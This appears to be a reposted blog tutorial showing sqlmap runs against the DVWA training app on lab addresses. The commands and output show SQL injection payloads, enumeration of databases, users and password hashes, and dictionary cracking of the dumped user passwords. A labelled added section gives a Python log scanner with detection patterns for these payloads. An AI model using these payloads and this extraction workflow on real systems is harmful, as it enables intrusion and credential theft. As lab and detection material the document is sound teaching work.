sql injection – sqlmap
Source: Internet | Published: check whether the domain is ICP-registered | Editor: 程序博客网 | Time: 2024/05/29 14:26
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
backtrack 5r1
/pentest/database/sqlmap
To find the SQL database version:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url
To find the SQL database names:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs
To find the database table names:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name
To find the database columns:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --columns -T table-name -D database-name
To see the data from the database:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --columns -T table-name -D database-name
Grab the session cookie with the Tamper Data Firefox plugin and pass it with --cookie:
root@bt:/pentest/database/sqlmap#./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 17:05:51
[17:05:52] [INFO] using '/pentest/database/sqlmap/output/IP-Address/session' as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8761=8761 AND 'FczA'='FczA&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'COXA'='COXA&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND 'kmcR'='kmcR&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'qxrK'='qxrK&Submit=Submit
---
[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, cdcol, mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[17:05:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/IP-Address'
./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --users --passwords
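Seen from the defender's side, the four injection techniques sqlmap listed above leave recognisable traces in the web server's access log. The following is an added example (not part of the original post and not sqlmap code) that parses combined-format log lines, URL-decodes each query parameter and tags the technique it matches, so a probe is caught even when it is replayed with a browser User-Agent; the log lines, source IP and timestamp are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Combined log format (Apache/Nginx default). Real clients URL-encode the
# request target, so it never contains a space.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One signature per technique sqlmap reported against DVWA's id parameter,
# run against each URL-decoded parameter value rather than the raw request.
SIGNATURES = {
    # id=1' AND 8761=8761 AND 'FczA'='FczA
    "boolean-blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    # ...FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # id=1' UNION ALL SELECT NULL, ...
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # id=1' AND SLEEP(5) AND 'qxrK'='qxrK
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    # CHAR(58,a,b,c,58) builds the ':abc:' delimiters sqlmap wraps results in
    "sqlmap-marker": re.compile(r"CHAR\s*\(\s*58(?:\s*,\s*\d+){1,8}\s*,\s*58\s*\)", re.I),
}

def analyze_line(line):
    """Finding dict for one log line, None if benign, {"error": "unparsed"}
    when the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return {"error": "unparsed"}
    target = urlsplit(m.group("target"))
    techniques, params = set(), []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        hits = [t for t, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            techniques.update(hits)
            params.append(name)
    # sqlmap's default User-Agent is its own banner; a probe sent with a browser
    # UA (--random-agent, or a manual replay) is still caught by its payload.
    tool_ua = m.group("ua").lower().startswith("sqlmap")
    if not techniques and not tool_ua:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": target.path,
            "params": params, "techniques": sorted(techniques),
            "tool_ua": tool_ua, "status": int(m.group("status"))}

def scan(lines):
    """All findings for an iterable of log lines, in order."""
    return [f for f in (analyze_line(ln) for ln in lines) if f is not None]

def summarize(findings):
    """Per source IP, the sorted set of techniques seen: one line of triage."""
    per_ip = {}
    for f in findings:
        if "error" not in f:
            per_ip.setdefault(f["ip"], set()).update(f["techniques"])
    return {ip: sorted(t) for ip, t in per_ip.items()}

def _log_line(payload, ua, ip="10.0.0.7", status=200):
    """Constructed combined-format line for a DVWA sqli request (sample data)."""
    qs = urlencode({"id": payload, "Submit": "Submit"})
    return (f'{ip} - - [29/May/2024:10:14:04 +0000] '
            f'"GET /dvwa/vulnerabilities/sqli/?{qs} HTTP/1.1" {status} 4321 "-" "{ua}"')

SQLMAP_UA = "sqlmap/1.0-dev (r4009)"
BROWSER_UA = "Mozilla/5.0"
# Constructed sample log: a benign request, then the four payload shapes from
# the sqlmap output above, two of them sent with a browser User-Agent.
SAMPLE_LOG = [
    _log_line("1", BROWSER_UA),
    _log_line("1' AND 8761=8761 AND 'FczA'='FczA", SQLMAP_UA),
    _log_line("1' AND SLEEP(5) AND 'qxrK'='qxrK", SQLMAP_UA),
    _log_line("1' UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST("
              "CHAR(117,73,80,113) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))#", BROWSER_UA),
    _log_line("1' AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),"
              "(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),"
              "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
              "AND 'COXA'='COXA", BROWSER_UA),
]
```

Run `scan(SAMPLE_LOG)` and `summarize(...)` over the sample to get one finding per probe and a per-IP technique list; pointing `scan` at an open access log file gives the same triage for real traffic.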
dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:07:20
[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application
>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'
[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test
[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'
[*] shutting down at: 11:07:22
dojo@dojo-vm:~/tools/sqlmap$
--------------------------------------------------------------
Updates
--------------------------------------------------------------
Find databases
Used the Tamper Data Firefox plugin to get the cookie, as below:
Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3
Reload the login page to get a clean URL: /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:14:04
[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'
[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test
[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:14:24
--------------------------------------------------------------
Find tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:27:40
[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:27:40
--------------------------------------------------------------
Find users
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:28:45
[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'
[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:28:45
--------------------------------------------------------------
Find passwords
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 10:24:19
[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---
[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+
[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'
[*] shutting down at: 10:24:30
http://www.myexploit.wordpress.com/web-application-webscarab/
--------------------------------------------------------------
/pentest/web/webscarab
